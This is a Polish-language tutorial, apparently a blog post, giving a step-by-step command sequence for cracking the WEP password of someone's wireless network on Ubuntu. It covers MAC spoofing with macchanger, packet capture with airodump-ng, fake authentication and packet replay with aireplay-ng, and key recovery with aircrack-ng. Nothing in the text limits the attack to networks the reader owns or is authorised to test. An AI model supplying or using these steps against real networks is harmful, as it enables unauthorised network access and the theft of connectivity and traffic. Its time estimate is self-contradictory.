Mamy sobie system operacyjny Ubuntu, nie ważne czy instalowany osobno czy spod windows'a. Nasz interfejs sieciowy nazywa się
wlan0 i jest to karta bezprzewodowa Intel Pro Wireless 3945ABG.Cel: uzyskać hasło dostępu do sieci bezprzewodowej...
Czas: jeśli jest jakiś użytkownik podpięty - kwadrans, w innym wypadku 15 min.
Zaczynamy.
Dla przypomnienia, żeby zainstalować coś w ubuntu w konsoli wpisujemy: aptitude install (nazwa) np.
aptitude install macchangerA potrzebne nam beda 2 programy: macchanger aircrack.
Otwieramy konsole (1).
airmon-ng - wyświetla interfacy sieciowe.
airmon-ng stop wlan0 - zatrzymuje karte bezprzewodowa
airmon-ng start wlan0 - wypisuje monitor mode enable on mon0
ifconfig mon0 down - wyłącza karte
macchanger --mac 00:11:22:33:44:55 mon0 - zmienia adres mac wirtualnej karty sieciowej mon0 na 00:11:..:55
ifconfig mon0 up - przywołuje do życia wirtualną kartę, już ze zmienionym mac.
airodump-ng mon0 - uruchamia skaner sieci bezprzewodowych
Wybieramy sieć którą chcemy zaatakować, zapisujemy kanał (oznaczony przez literkę CH, u mnie 11), adres routera (bssid w postaci aa:bb:cc:dd:ee:ff), oraz essid czyli nazwa sieci.
airodump-ng -c 11 -w nazwa_pliku --bssid aa:bb:cc:dd:ee:ff mon0 - "-w" oznacza nazwe pliku ;). Zwracamy uwagę na kolumne #Data
- która odpowiada za ilość zebranych pakietów, potrzebnych nam później do uzyskania hasła.
Otwieramy nową konsole (2).
Teraz musimy się podłączyć do routera, żeby w ogóle chciał współpracować. Służy do tego "aireplay-ng" z przełącznikiem -1.
aireplay-ng -1 0 -a aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 -e nazwa_sieci mon0 - "-a" tu podajemy bssid routera, "-h" nasz mac adres, "-e" nazwa sieci jaką rozgłasza router, 0 po "-1" oznacza, próbuj podłączyć się do routera, aż ci się nie uda.
Udało się - pojawi się napis - Association successful :-)
Tu zaczynają się różne wersje ataku. Opisze ten najbardziej (dla mnie) optymalny, czyli z przełącznikiem -2.
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 mon0
Tu pojawi się ciąg znaków, ułożonych w jakieś tam kolumny, a na dole:
Use this packet?
Wpisujemy:
y
Otwieramy nową konsole (3), po czym wpisujemy:
aircrack-ng nazwa_pliku-01.cap
Teraz program deszyfrujący stara się odzyskać hasło z zebranych przez nas danych. Co każde 5 tysięcy, pakietów #Data program sam będzie podejmował próbę odzyskania hasła. Można zacząć łamać hasło już od 5 tys. pakietów #Data, jednak dopiero ok. 25 tys. daje realne szanse na uzyskanie klucza. Klucz możemy otrzymać w wersji ASCII (czyli zwykłe literki i cyferki) albo w wersji szesnastkowej, oddzielonej dwukropkami, i w takiej postaci należy ją później podać przy wpisywaniu hasła do sieci bezprzewodowej.
Tutaj filmik instruktażowy, z którego ja się uczyłem:
